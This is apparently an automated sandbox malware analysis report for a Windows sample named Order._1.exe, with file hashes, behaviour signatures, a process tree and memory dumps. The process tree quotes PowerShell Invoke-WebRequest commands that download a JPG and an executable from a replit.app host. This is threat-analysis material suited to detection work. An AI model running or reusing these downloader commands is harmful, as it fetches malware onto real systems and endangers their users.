Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    120s
  • max time network
    121s
  • platform
    windows7_x64
  • resource
    win7-20240705-en
  • resource tags

    arch:x64arch:x86image:win7-20240705-enlocale:en-usos:windows7-x64system
  • submitted
    30/07/2024, 09:10

General

  • Target

    Order._1.exe

  • Size

    288KB

  • MD5

    587be0c9be93274c3d38ef27c3a50aa4

  • SHA1

    6808c0da1276c7ad2021ffb7c0b8d743f5c87b35

  • SHA256

    cf4ff6cb9038c130e7b6d76daf2af62d018541c3d561d5e0aba8a34614ebc5d8

  • SHA512

    5d2dbadb93ae2d91c3e7af58be9b28a7270a86b1c3b2bfbae64f232a06f26efa72162dc4adb22ce1f269429eecb2d4b5b44e1c1494658de702c1f2dad0c9c879

  • SSDEEP

    3072:Cq6+ouCpk2mpcWJ0r+QNTBf2Wk1qXkXRA4XTZ5N:Cldk1cWQRNTB+l8KN

Score
8/10

Malware Config

Signatures

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Powershell Invoke Web Request.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 10 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\Order._1.exe
    "C:\Users\Admin\AppData\Local\Temp\Order._1.exe"
    1⤵
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2004
    • C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F602.tmp\F603.tmp\F604.bat C:\Users\Admin\AppData\Local\Temp\Order._1.exe"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1656
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/purchaseOrder.jpg' -OutFile purchaseOrder.jpg"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2316
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        Powershell -Command "Invoke-WebRequest 'https://secured-order-download-businessportal.replit.app/CoinAIfdp.exe' -OutFile CoinAIfdp.exe"
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2696

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Temp\F602.tmp\F603.tmp\F604.bat

    Filesize

    336B

    MD5

    01c5cda0bd57d42a84beff225913c7f6

    SHA1

    1047c8ce097c87214b5337c98278f4ce5a5896f7

    SHA256

    454734ff80f0ff62344d6adeaf700983b1d5da605d192226e3a1e40020ec0d31

    SHA512

    76af6d488d7fdf8d701d16e0c884811df4c7a7bf34b74c30f7e993490420ebb895889048ae9ec5ca82d037f49de42028fca751d66915df543cd4394fcff727b2

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    4642b21b8f12258876c2f6beddddadeb

    SHA1

    221ff71c5ad1aca6f3740d70bbe5b4de9546661e

    SHA256

    e47fa23763f1f09c4e23e5268ff518ad20e92a38914225903a14180e8691774b

    SHA512

    a3d38076bbab1ed78caf58e09867f70bd1ca4e0ef11388edf3a72943139694aa4529ba141ff426f02080bbc6c977a5f128a0e27d70f4821023fae492e12915f4

  • memory/2316-11-0x000007FEF5790000-0x000007FEF612D000-memory.dmp

    Filesize

    9.6MB

  • memory/2316-8-0x0000000001E10000-0x0000000001E18000-memory.dmp

    Filesize

    32KB

  • memory/2316-9-0x000007FEF5790000-0x000007FEF612D000-memory.dmp

    Filesize

    9.6MB

  • memory/2316-12-0x000007FEF5790000-0x000007FEF612D000-memory.dmp

    Filesize

    9.6MB

  • memory/2316-7-0x000000001B670000-0x000000001B952000-memory.dmp

    Filesize

    2.9MB

  • memory/2316-10-0x000007FEF5790000-0x000007FEF612D000-memory.dmp

    Filesize

    9.6MB

  • memory/2316-13-0x000007FEF5790000-0x000007FEF612D000-memory.dmp

    Filesize

    9.6MB

  • memory/2316-14-0x000007FEF5790000-0x000007FEF612D000-memory.dmp

    Filesize

    9.6MB

  • memory/2316-6-0x000007FEF5A4E000-0x000007FEF5A4F000-memory.dmp

    Filesize

    4KB

  • memory/2696-20-0x000000001B660000-0x000000001B942000-memory.dmp

    Filesize

    2.9MB

  • memory/2696-21-0x0000000002350000-0x0000000002358000-memory.dmp

    Filesize

    32KB